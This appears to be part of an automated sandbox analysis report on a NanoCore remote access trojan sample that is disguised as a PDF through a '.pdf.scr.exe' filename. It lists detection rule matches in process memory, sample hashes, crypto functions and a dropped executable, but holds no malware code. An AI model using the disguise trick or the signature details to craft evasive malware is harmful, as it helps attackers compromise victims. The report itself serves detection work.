Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: 004349256789197.pdf.scr.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D848E 0_2_003D848E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E6CDC 0_2_003E6CDC
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E00B7 0_2_003E00B7
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E4088 0_2_003E4088
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D40FE 0_2_003D40FE
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E7153 0_2_003E7153
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F51C9 0_2_003F51C9
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D32F7 0_2_003D32F7
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E62CA 0_2_003E62CA
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E43BF 0_2_003E43BF
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DC426 0_2_003DC426
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DF461 0_2_003DF461
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FD440 0_2_003FD440
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E77EF 0_2_003E77EF
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D286B 0_2_003D286B
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FD8EE 0_2_003FD8EE
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DE9B7 0_2_003DE9B7
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_004019F4 0_2_004019F4
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003E3E0B 0_2_003E3E0B
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F4F9A 0_2_003F4F9A
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DEFE2 0_2_003DEFE2
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BBE0BE 6_2_00BBE0BE
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC8037 6_2_00BC8037
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC2007 6_2_00BC2007
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BAE1A0 6_2_00BAE1A0
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDA28E 6_2_00BDA28E
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC22C2 6_2_00BC22C2
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA225D 6_2_00BA225D
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BBC59E 6_2_00BBC59E
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C2C7A3 6_2_00C2C7A3
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDE89F 6_2_00BDE89F
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1291A 6_2_00C1291A
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BD6AFB 6_2_00BD6AFB
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C08B27 6_2_00C08B27
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BCCE30 6_2_00BCCE30
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C351D2 6_2_00C351D2
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BD7169 6_2_00BD7169
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA9240 6_2_00BA9240
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA9499 6_2_00BA9499
Tries to load missing DLLs
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc.dll
Uses 32bit PE files
Source: 004349256789197.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
